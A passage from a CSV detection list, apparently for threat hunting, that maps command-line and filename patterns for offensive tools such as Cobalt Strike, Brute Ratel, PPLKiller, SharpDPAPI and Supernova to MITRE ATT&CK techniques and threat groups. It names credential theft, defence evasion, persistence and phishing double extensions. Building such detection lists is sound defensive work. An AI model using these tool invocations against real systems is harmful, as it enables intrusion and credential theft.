TA0001","N/A","N/A","Reconnaissance","https://github.com/dievus/msLDAPDump","1","1","N/A","N/A","3","205","27","2023-08-14T13:15:29Z","2022-12-30T23:35:40Z" +"*.api.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.apps.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 
- T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.asreproast.txt*","offensive_tool_keyword","msldapdump","LDAP enumeration tool implemented in Python3","T1018 - T1210.001","TA0007 - TA0001","N/A","N/A","Reconnaissance","https://github.com/dievus/msLDAPDump","1","1","N/A","N/A","3","205","27","2023-08-14T13:15:29Z","2022-12-30T23:35:40Z" +"*.asse.devtunnels.ms*","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","1","N/A","8","10","N/A","N/A","N/A","N/A" +"*.athena_utils *","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*.beta.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.bin -enc rc4 -lang c -k 3 -o *.bin*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z" 
+"*.bin -enc rc4 -lang csharp -k 9*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z"
+"*.bin -enc rot -lang csharp -k 2 -d*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z"
+"*.bin -enc rot -lang rust -k 7*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z"
+"*.bin -enc xor -lang csharp -k 2 -v nickvourd*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z"
+"*.bin -enc xor -lang nim -k 4*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z"
+"*.blog.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - 
T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z"
+"*.BruteRatel*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A"
+"*.cobaltstrike*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - 
T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A"
+"*.cobaltstrike.beacon_keys*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1038","225","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z"
+"*.com/dcsync/*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z"
+"*.com/SecureAuthCorp*","offensive_tool_keyword","Github Username","github repo hosting exploitation tools for pentesters","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/SecureAuthCorp","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*.com/SpiderLabs*","offensive_tool_keyword","Github Username","github repo hosting exploitation tools adn documentation for pentesters","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/SpiderLabs","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*.dev.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - 
T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z"
+"*.doc.bat*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*.doc.dll*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*.doc.exe*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*.doc.htm*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*.doc.jar*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - 
T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*.doc.js*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*.doc.sfx*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*.doc.vbs*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*.docx.bat*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*.docx.dll*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*.docx.exe*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*.docx.htm*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*.docx.jar*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*.docx.js*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 
- T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*.docx.sfx*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*.docx.vbs*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*.events.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z"
+"*.exe --b64 --path * --args ","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - 
patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Exploitation tools - Defense Evasion","https://github.com/Flangvik/NetLoader","1","0","N/A","10","7","684","139","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z"
+"*.exe certificates /pvk:*.pvk*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z"
+"*.exe -group=remote -computername=*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","fp risks","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z"
+"*.exe * /hide * /range:* /auto:*.*","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","N/A","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","8","10","N/A","N/A","N/A","N/A"
+"*.exe * -eventlog *Key Management Service*","offensive_tool_keyword","cobaltstrike","Persistence by writing/reading shellcode from Event Log","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - 
T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/improsec/SharpEventPersist","1","0","N/A","10","10","348","50","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z"
+"*.exe * --source Persistence*","offensive_tool_keyword","cobaltstrike","Persistence by writing/reading shellcode from Event Log","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang 
Panda - Chimera - APT29","C2","https://github.com/improsec/SharpEventPersist","1","0","N/A","10","10","348","50","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z"
+"*.exe *.bin -enc aes -lang csharp*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z"
+"*.exe *-searchforest*-pwdlastset*","offensive_tool_keyword","Get-RBCD-Threaded","Tool to discover Resource-Based Constrained Delegation attack paths in Active Directory Environments","T1558 - T1208 - T1550 - T1484 - T1486","TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/FatRodzianko/Get-RBCD-Threaded","1","0","N/A","N/A","2","115","19","2021-08-10T23:29:48Z","2019-12-21T00:08:28Z"
+"*.exe /disableLSAProtection*","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","0","N/A","10","8","745","127","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z"
+"*.exe /method:create /taskname:* /trigger:* /modifier:* /program:* /argument:*.dll /remoteserver:*","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and lateral movement in red team operation","T1210 T1570 T1021 T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","0","N/A","N/A","3","299","42","2022-07-05T10:24:45Z","2021-10-12T15:27:32Z"
+"*.exe /wakeall*","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 
","N/A","N/A","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","8","10","N/A","N/A","N/A","N/A"
+"*.exe action=GetScheduledTaskCOMHandler*","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z"
+"*.exe action=ListRunningServices*","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z"
+"*.exe action=ListScheduledTasks*","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z"
+"*.exe action=ListTaskNames*","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z"
+"*.exe --adcs * --remote *","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","0","N/A","10","8","749","119","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z"
+"*.exe app /create /name:* 
